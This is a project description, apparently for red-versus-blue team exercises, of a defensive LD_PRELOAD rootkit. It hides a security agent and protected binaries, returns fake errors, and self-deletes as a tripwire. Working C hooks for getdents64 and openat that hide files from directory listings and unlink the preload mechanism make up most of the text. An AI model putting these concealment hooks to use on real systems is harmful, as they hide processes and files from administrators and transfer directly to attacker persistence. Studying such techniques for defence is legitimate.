Defensive LD_PRELOAD rootkit that conceals wazuh-agent and silently monitors unauthorized filesystem changes from inside attacker-controlled processes. The main priority is stealth. When a process attempts to access the rootkit's own files or /etc/ld.so.preload, "apoptosis" is triggered and the rootkit cleanly deletes itself. Concealing the fact that this strategy is in use matters more than fighting red team directly: the incident reports should show which process tripped the Cytochrome C tripwire, so that a human admin can work back from it to red team's persistence mechanism and C2.
Also includes an "epidermis" of shell scripts that protect the "organs" (important binaries). Queries about wazuh are filtered out and simulated errors are returned as needed. Installation is automatic, keyed on the presence of the target organ in /usr/bin. The .organ files (the real binaries) can still be invoked directly (e.g. run "apt.organ update" instead of "apt update"), but the rootkit conceals them from getdents64 so they never appear in directory listings.
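As an added example (not the project's own code), the following C sketch shows the two hooks this design rests on: filtering .organ names out of getdents64 results, and turning an openat of /etc/ld.so.preload or the rootkit's own library into apoptosis that logs the offending process and unlinks the rootkit. The paths ROOTKIT_SO and REPORT_PATH, the "name ends in .organ" matching rule, the report line format, and reaching the real calls through syscall(2) instead of dlsym(RTLD_NEXT) are assumptions of the example, not the project's choices. Build with `gcc -shared -fPIC -o libcytc.so cytc.c`; `demo_remaining` exercises the filter on a constructed buffer without touching a real directory.

```c
#define _GNU_SOURCE
#include <dirent.h>
#include <fcntl.h>
#include <stdarg.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <sys/syscall.h>
#include <unistd.h>

/* Assumed paths for this example; the real project's differ. */
#define ORGAN_SUFFIX ".organ"
#define ROOTKIT_SO   "/usr/lib/libcytc.so"
#define REPORT_PATH  "/var/log/cytc-apoptosis.log"

/* Record layout the kernel writes for getdents64(2). */
struct linux_dirent64 {
    unsigned long long d_ino;
    long long          d_off;
    unsigned short     d_reclen;
    unsigned char      d_type;
    char               d_name[];
};

/* A name is an organ when it ends in ".organ" and has a non-empty stem. */
int is_organ(const char *name)
{
    size_t n = strlen(name), s = strlen(ORGAN_SUFFIX);
    return n > s && strcmp(name + n - s, ORGAN_SUFFIX) == 0;
}

/* Drop .organ records from a getdents64 buffer in place; return new length.
 * Pure, so it can be tested on a constructed buffer without a real fd. */
ssize_t hide_organs(char *buf, ssize_t nread)
{
    ssize_t in = 0, out = 0;
    while (in < nread) {
        struct linux_dirent64 *d = (struct linux_dirent64 *)(buf + in);
        unsigned short len = d->d_reclen;
        if (len == 0 || in + len > nread) break;   /* malformed record: stop */
        if (!is_organ(d->d_name)) {
            if (out != in) memmove(buf + out, buf + in, len);
            out += len;
        }
        in += len;
    }
    return out;
}

/* Paths whose mere opening reveals the mechanism (the tripwire). */
int is_tripwire(const char *path)
{
    return path && (strcmp(path, "/etc/ld.so.preload") == 0 ||
                    strcmp(path, ROOTKIT_SO) == 0);
}

/* Apoptosis: record who tripped the wire, then remove ourselves. This runs
 * inside the offending process, so /proc/self describes the attacker. */
static void apoptosis(const char *path)
{
    char exe[256] = "?";
    ssize_t n = readlink("/proc/self/exe", exe, sizeof exe - 1);
    if (n > 0) exe[n] = '\0';
    FILE *f = fopen(REPORT_PATH, "a");
    if (f) {
        fprintf(f, "pid=%d ppid=%d exe=%s touched=%s\n",
                getpid(), getppid(), exe, path);
        fclose(f);
    }
    unlink("/etc/ld.so.preload");   /* no injection into new processes */
    unlink(ROOTKIT_SO);              /* loaded copies disappear at exit */
}

/* Hook: every directory listing in a dynamically linked program lands here. */
ssize_t getdents64(int fd, void *dirp, size_t count)
{
    ssize_t n = syscall(SYS_getdents64, fd, dirp, count);
    return n > 0 ? hide_organs(dirp, n) : n;
}

/* Hook: glibc routes open()/fopen() through openat(2). A tripwire path
 * triggers apoptosis, then the call proceeds so the caller sees nothing odd. */
int openat(int dirfd, const char *path, int flags, ...)
{
    mode_t mode = 0;
    if ((flags & O_CREAT) || (flags & O_TMPFILE) == O_TMPFILE) {
        va_list ap;
        va_start(ap, flags);
        mode = va_arg(ap, mode_t);
        va_end(ap);
    }
    if (is_tripwire(path)) apoptosis(path);
    return syscall(SYS_openat, dirfd, path, flags, mode);
}

/* Demo scaffolding: append one 8-byte-aligned record, as the kernel would. */
static size_t put_rec(char *buf, size_t len, const char *name)
{
    struct linux_dirent64 *d = (struct linux_dirent64 *)(buf + len);
    size_t reclen = (offsetof(struct linux_dirent64, d_name) + strlen(name) + 1 + 7) & ~(size_t)7;
    d->d_ino = 1; d->d_off = 0; d->d_reclen = (unsigned short)reclen; d->d_type = DT_REG;
    strcpy(d->d_name, name);
    return len + reclen;
}

/* Filters a constructed listing ".", "apt.organ", "apt", "sudo.organ";
 * returns the survivor count (2), or -1 if survivors are not exactly ".", "apt". */
int demo_remaining(void)
{
    long long store[32];            /* aligned backing storage for the buffer */
    char *buf = (char *)store;
    const char *want[] = { ".", "apt" };
    size_t len = 0;
    int count = 0;
    len = put_rec(buf, len, ".");
    len = put_rec(buf, len, "apt.organ");
    len = put_rec(buf, len, "apt");
    len = put_rec(buf, len, "sudo.organ");
    ssize_t out = hide_organs(buf, (ssize_t)len);
    for (ssize_t i = 0; i < out; ) {
        struct linux_dirent64 *d = (struct linux_dirent64 *)(buf + i);
        if (count >= 2 || strcmp(d->d_name, want[count]) != 0) return -1;
        count++;
        i += d->d_reclen;
    }
    return count;
}
```

Two caveats a deployer should keep in mind. Both hooks only reach programs that are dynamically linked and go through libc; a statically linked ls or a tool issuing raw syscalls sees the .organ files and never trips the wire, which is one reason the design leans on self-deletion rather than on resisting inspection. And apoptosis runs with the privileges of the process that tripped it: an unprivileged attacker process cannot unlink root-owned files or append to a root-owned log, so the cleanup and the report channel only work if the tripping process is root or the files are arranged to be removable and writable by it (a world-writable log is itself a tell).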